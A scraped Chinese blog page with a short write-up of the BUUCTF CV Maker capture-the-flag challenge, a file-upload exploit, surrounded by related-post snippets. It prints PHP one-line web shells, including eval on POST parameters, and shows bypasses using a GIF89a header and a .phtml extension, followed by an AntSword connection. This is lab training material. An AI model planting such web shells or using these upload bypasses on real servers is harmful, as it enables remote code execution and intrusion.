buuctf-[WUSTCTF2020]CV Maker 文件上传漏洞

已于 2023-10-05 15:09:37 修改
阅读量400 收藏 1
点赞数
文章标签: 安全
于 2023-09-30 17:19:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/133436657
版权

打开环境

随便登录注册一下

进入到了profile.php

其他没有什么页面,只能更换头像上传文件,所以猜测是文件上传漏洞

上传一句话木马看看

<?php eval(@$_POST['a']);?>

 回显

搜索一下

添加文件头GIF89a。上传php文件

查看页面源代码,看到上传的php的文件

蚁剑连接

木…
关注
基恩士-CV-X300系列-GSD文件.zip
11-08
基恩士的CV-X300系列视觉传感器与GSDML文件的关系在于,通过这个文件,工程师可以在PLC程序中集成和配置CV-X300系列传感器,确保传感器能正确地与控制系统通信,实现数据交换和控制指令的执行。GSDML文件的使用简化...
BUUCTF文件上传知识点总结
qq_49833809的博客
11-13 634
文件上传知识点总结
BUUCTF-Web[ACTF2020 新生赛]Upload
rumil的博客
06-24 2386
尝试修改后缀为:php1,php2, php3, php4, php5, phps, pht, phtm, phtml。经过测试和验证,当后缀为.phtml时上传成功的同时语句能被解析,可通过蚁剑连接。这次告诉我们这是一个有害的文件,无法正常上传,说明后端也做了过滤,我们尝试绕过。访问成功,验证是否可执行php语句,能被解析。连接成功,添加,并进入到文件目录,找flag。同理图片码也无法进行解析,上传无效。浏览器搜about:config。修改文件后缀,上传成功但无法解析。回到靶机界面,刷新后,再次上传。
【CTF Web】BUUCTF Upload-Labs-Linux Pass-14 Writeup(文件上传+PHP+文件包含漏洞+JPEG图片马+getimagesize绕过)
最新发布
HEX9CF的技术博客
09-09 962
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。
BUUCTF-Web】[极客大挑战 2019]Upload
weixin_49298681的博客
01-05 1155
Upload=> 文件上传漏洞
BUUCTF_N1BOOK_[第二章 web进阶]文件上传_详解
weixin_43852034的博客
03-04 1244
最后的小插曲:本来以为上传成功之后,用蚁剑砍进去就完事儿了,结果发现居然会报错:嗯???于是直接访问一下上传后的文件:没想到直接得到了flag…后续又把2.php.xxx文件的内容修改为?尝试了一下,发现访问后也是同样的效果。那大概是环境本身做了限制吧…思路应该是没错的,蚁剑虽然说没砍进去…但你就说flag拿没拿到吧!
[WUSTCTF2020]CV Maker1 --不会编程的崽
不会编程的崽的博客
02-19 633
文件上传
基恩士-CV-X400系列-GSD文件.zip
11-08
了解并正确解读GSDML文件,可以帮助工程师和系统集成者快速评估基恩士CV-X400系列相机是否适合他们的项目需求,以及如何有效地将这些相机集成到现有的自动化或视觉系统中。同时,这也有助于确保硬件和软件之间的无缝...
survey-computer-vision:2020-2021年计算机视觉概述论文分方向整理
03-06
勘测计算机视觉计算机视觉概述论文分方向整理(持续更新)目录本文共梳理了46篇相关文献,由中科院自动化所学者发布。基于深度学习(DL)的目标检测已经取得了很大的进展,这些方法通常假设有大量的带标签的训练数据...
COMX-P2020 COM Express Module Installation and Use P/N: 6806800K
07-13
- **工业控制**: 适用于工业自动化、机器视觉等领域。 - **通信设备**: 可用于网络路由器、交换机等通信基础设施。 - **医疗设备**: 适合应用于医疗成像设备、远程监控系统等医疗领域。 - **军事应用**: 支持军用级...
Awesome-ECCV2020-Low-Level-Vision:ECCV2020低水平视觉或图像重建的论文和代码的集合
03-20
2020年ECCV(欧洲计算机视觉会议)将于8月2日到8月28日在线上一次公开。目前ECCV2020已经放榜,有效投稿数为5025,最终收录1361篇论文,录取率是27%。其中104篇口头,161篇聚光灯,其余的担任海报。 ECCV2020的...
buuctf文件上传漏洞(Pass1~15)
yxzrw_TW的博客
10-21 1593
文件上传漏洞笔记
BUUCTF--[WUSTCTF2020]CV Maker
qq_46263951的博客
07-06 1409
一开始我们看到是一个注册页面,应该没有什么可用的漏洞,注册进去看看 进入之后看到需要我们更改头像,应该是一个文件上传漏洞,当上传一个php文件时出现一个这样的错误 通过查询我们可以了解到该函数是用来检测文件头的,也就是需要我们构造一个文件头为图像类型的php一句话木马 注意:文件头和一句话木马不可放在同一行 GIF89 <?php eval($_POST['123']); ?> 上传成功后我们通过查看网页源码发现图片路径 通过蚁剑连接即可 ...
[WUSTCTF2020]CV Maker
yym68686
09-24 1640
[WUSTCTF2020]CV Maker 打开网页,先登录,发现可以更改头像,想到可能是文件上传漏洞,试一试上传PHP文件,发现页面报错:exif_imagetype not image!,查阅PHP手册: exif_imagetype (PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8) exif_imagetype — 判断一个图像的类型,exif_imagetype() 读取一个图像的第一个字节并检查其签名。 说明exif_imagetype只检查文件头,所以我们可以
[WUSTCTF2020]CV Maker 文件头检查
m0_64180167的博客
09-27 144
就是检查文件头 那我们直接修改文件头上传即可。报错了我们去看看 这个 exif是什么。我们直接随便上传一个看看。很显然是我们文件上传
BUUCTF Web upload
H18779083518的博客
05-10 435
script language="php">eval($_REQUEST[1])</script>打开后即得flag:flag{d8c839e5-3aa7-40db-9899-858007fc3778}首先尝试一句话木马上传,尝试过多种绕过手段后发现仍然无法上传,于是我们怀疑是一句话木马被黑名单了。方法二:正常情况上传的文件都会存放在Upload,更可况题目就叫upload。方法一:看bp的回显(我没看见所以选择了方法二)成功上传一句话木马后我们尝试寻找木马的存放路径。找到路径后使用蚁剑连接,连接成功。
[WUSTCTF2020]CV Maker 1
ubaichu的博客
07-23 477
[WUSTCTF2020]CV Maker 1 很简单的一道
Web-buuctf-Upload
weixin_52804141的博客
01-20 201
这里两种绕过方法,第一种在浏览器中把java scrabit脚本关了就可以了,第二种更改下后缀文件,改成允许上传的文件后缀就好了。这里改成在把文件后缀改位php,发现不行,就可以试试phtml(这两种后缀都不会被服务器视为php执行)总结,很简单的一道上传题,以前也练过很多,就当一道复习题来做了。上传成功,蚁剑连接就好了,在找到flag文件,获得flag。先上传一个一句话木马,发现存在前端绕过。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值